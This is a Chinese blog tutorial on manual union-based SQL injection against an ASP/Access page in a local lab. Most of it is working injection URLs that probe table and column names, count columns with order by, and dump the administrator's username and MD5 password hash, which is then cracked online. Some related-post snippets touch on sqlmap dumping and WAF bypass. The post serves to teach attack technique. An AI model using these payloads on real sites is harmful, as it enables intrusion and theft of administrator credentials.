ASP使用联合查询语句手工注入办法

最新推荐文章于 2024-07-12 14:26:59 发布
最新推荐文章于 2024-07-12 14:26:59 发布
阅读量819 收藏 1
点赞数
文章标签: asp 破解 工具 数据库 加密 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/busty010/article/details/6017744
版权

大家好,我是夜虫儿,今天我给大家做一个 asp手工注入的教程

我在本地搭建了一个环境,作为 调试测试使用

首先,我们要想注入首先 要找个注入点,我相信这一点 大家都很熟系
http://localhost:1503/shownews.asp?id=52%20and%201=1 返回正确
http://localhost:1503/shownews.asp?id=52%20and%201=2 返回错误

这就可以判断 http://localhost:1503/shownews.asp?id=52 这里存在注入点
我们接下来就要猜解 数据库中的 管理员所在的表名

http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20*%20from%20admin) 这一句的意思就是 猜解 是否存在admin这个表名

如果存在 返回的是正确页面,如果不存在 ,返回的就是错误页面
我们现在可以看到 返回正确 ,说明 的确存在 admin这个表名
下一步 我们就要 猜解 表中的 列名
就是把“*”替换成 我们要猜解的列名

http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20username%20from%20admin)   返回正确页面,表示存在username这个列
http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20pass%20from%20admin)  返回错误 表示 不存在pass这个列

没关系 ,我们继续 猜解
http://localhost:1503/shownews.asp?id=52%20and%20exists%20(select%20password%20from%20admin)  返回正确页面,表示 存在password这个列

先说一下吧,username 是用来存放 管理员 用户名的列
password是用来 存放 管理员密码的列
现在 我们已经 猜到了这两个列
那么接下来 我们就要 猜解 管理员的用户名 和密码

在这里 我使用联合 查询语句 来猜解

我们先来判断列的长度
等等,换首歌听
不好意思,我们继续开始

http://localhost:1503/shownews.asp?id=52%20order%20by%2010 猜测长度为10  返回正确页面 说明长度是 大于等于10 的
我们继续把数字 增加  呵呵,谁在 说我坏话???

http://localhost:1503/shownews.asp?id=52%20order%20by%2015  返回错误页面,说明 长度在 10到15之间
http://localhost:1503/shownews.asp?id=52%20order%20by%2013 返回错误
说明在10到13 之间
http://localhost:1503/shownews.asp?id=52%20order%20by%2011 返回错误

说明长度是小于11的
刚才我们已经判断了 长度 是大于等于10的
那么 现在我们就可以知道 长度就是 10

http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin  现在就开是暴管理员的用户名和密码了

对于新手,就好好看看 我这句的语法,1,2,3,4,5,6,7,8,9,10表示的是长度
from admin  因为我们前面已经猜出了 存在admin这个表名
我们看看页面,发现 在页面上爆出了两个字段的位置
2和3
在这里就需要用到我们刚才猜到的列名了
把2替换成username

http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,username,3,4,5,6,7,8,9,10%20from%20admin  直接爆出了 管理员的名字
这个要比工具 猜解 快的多

把3替换成 password
http://localhost:1503/shownews.asp?id=52%20and%201=2%20union%20select%201,username,password,4,5,6,7,8,9,10%20from%20admin  直接爆出管理员密码  这也比工具猜解 快的多多多多多

好了,我们把这个经过md5加密的密码 拿到 www.cdm5.com上去破解吧
破解的明文是:admin888

busty010
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入sqli-labs学习(less-1)
Yy10205473的博客
10-17 2583
sqli-labs:less-1 sqli-labs靶场网址. 通过sqli-labs中的题目来学习sql注入 sql注入的基本步骤 (1)判断是否存在注入,判断类型并且闭合语句 (2)使用order by 关键字来判断字段数 (3)选择注入语句,使用union查询或者报错注入 (4)获取数据库用户,版本,当前连接的数据库等信息 (5)获取某个数据库表的信息,获取列信息 (6)获取表中的数据 手工注入 进入less-1页面,根据页面的英文提示,发现需要我们输入参数 在后面添加参数。 http://10.1
SQL注入自动扫描工具中的语句
weixin_30888027的博客
05-01 149
包括猜解数据库库名、表名、字段名、字段内容(表内容)、表条数,以及测试相关的权限。(mssql/mysql)==================================GET http://xgzx.whcm.com.cn/show.asp ... er_reward&id=73GET http://xgzx.whcm.com.cn/show.asp ... 73%...
mysql 错误回显注入,SQL注入实战篇2--显错注入
weixin_31159999的博客
03-23 237
本次实战靶场用的封神台的SQL注入靶场。看过实战1后,咱们就直接来试试自己有没有学会。因为是靶场,所以肯定存在漏洞,咱们就不判断是否存在注入了。第一步:从页面显示来看,这种应该是一个数字型的回显注入。那么我们就来看看有几列。构造?id=1 and 1=1 group by 1发现页面没有报错,继续往后group by 2和group by 3...,当试到4的时候发现查询不到了,由此判断应该是有三...
SQLMAP注入Access数据库
weixin_34176694的博客
04-02 368
今天偶遇一Access数据库 1.首先尝试是否存在注入点,and1=1,and 1=2,发现返回信息不一样 2.使用sqlmap脱裤,发现时Access数据库,不能提权, 3.那就直接暴库吧,sqlmap.py -uhttp://www.XXX.cc/common.asp?id=2%20and%201=2 --tables 期间因为线程太慢了,去配置文件改了一下线程 ...
安全狗之绕过注入
xiuzhentianting的博客
09-14 1650
?ArticleID=371 a%nd (select top 1 asc(mid(UserName,1,1)) f%rom Manage_User)=97 也就是加了一些百分号 说明不能完全依赖第三方的安全软件,关键还是写代码要注意。
ASP中 SQL语句 使用方法第1/3页
10-30
ASP中的SQL语句是Web开发中用于与数据库交互的基础,特别是在使用Active Server Pages (ASP)技术时。ASP结合SQL能够动态地从数据库中检索、更新和管理数据。本篇文章主要探讨了如何在ASP环境中有效使用SQL语句。 ...
ASP中经常使用的SQL语句与教程说明
10-30
ASP中的SQL语句与教程说明】 在ASP (Active Server Pages)编程中,SQL(Structured Query Language)语句是用于与数据库交互的核心工具。本文将详细介绍ASP中常用的SQL语句,特别是SELECT语句及其相关子句,以...
简单ASP手工注入流程
09-27
假设这里我们猜解出来的16位管理员密码是:7a57a5a...经过幸苦劳累的手工注入,我们搞定了管理员账户为:admin520,密码为:admin,接下来我们就继续猜测管理员后台登陆网址 常见的ASP的管理员后台登陆网址如下:
ASP手工注入
08-08
ASP手工注入ASP 入侵 渗透 手工注入
asp.net实现的MVC跨数据库多表联合动态条件查询功能示例
10-20
ASP.NET MVC框架中,开发跨数据库多表联合动态条件查询功能是一项常见的需求,尤其是在处理复杂的数据检索场景时。这个示例将引导我们了解如何在ASP.NET MVC中实现这一功能。 首先,我们要明白MVC(Model-View-...
记一次ASP+ACCESS手注
u013622866的博客
05-03 194
查找注入注入点一般存在于数据交互的位置,比如新闻,要事,各种活动……等等位置,所以先访问新闻页面,打开的网址是:http://192.168.1.102/NewsInfo.asp?Id=131,但是不知道这里是否存在注入,那就先猜测这个页面存在注入点吧 验证是否存在注入点,payload:?Id=131%20and%201=2(当然使用别的语句也能实现.),发现页面变成了下面这...
SQL注入系列之ASP+ACCESS手动注入(一)----数字型
热门推荐
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
asp sql两表连接查询
草灯的专栏
03-18 3572
懂的sql语句就可以快速查找出我们需要的数据,不然就要嵌套一层又一层,以前很少用连接语句来查询数据,经常要建立俩个rrs记录集,这样其实效率也
简单联合union查询注入
vcdy
06-02 9180
联合查询有前提  必须有显示位 用sql-labs来学习这是第一个http://127.0.0.1/sqli-labs/Less-1/?id=1一、判断是否用'做字符串引号http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+正常输出出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()二、判断它所在的数据库有几列http://127.0....
asp联合查询
weixin_30483013的博客
06-08 335
<% set rss=server.createobject("adodb.recordset") ssql="select * from [dormitory] left join [allot] on allot.r_id=dormitory.r_id and dormitory.build=allot.build where dormitory.build='"&amp...
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 156
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1223
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
ASP使用SQL语句教程.pdf
11-26
ASP使用SQL语句教程.pdfASP使用SQL语句教程.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值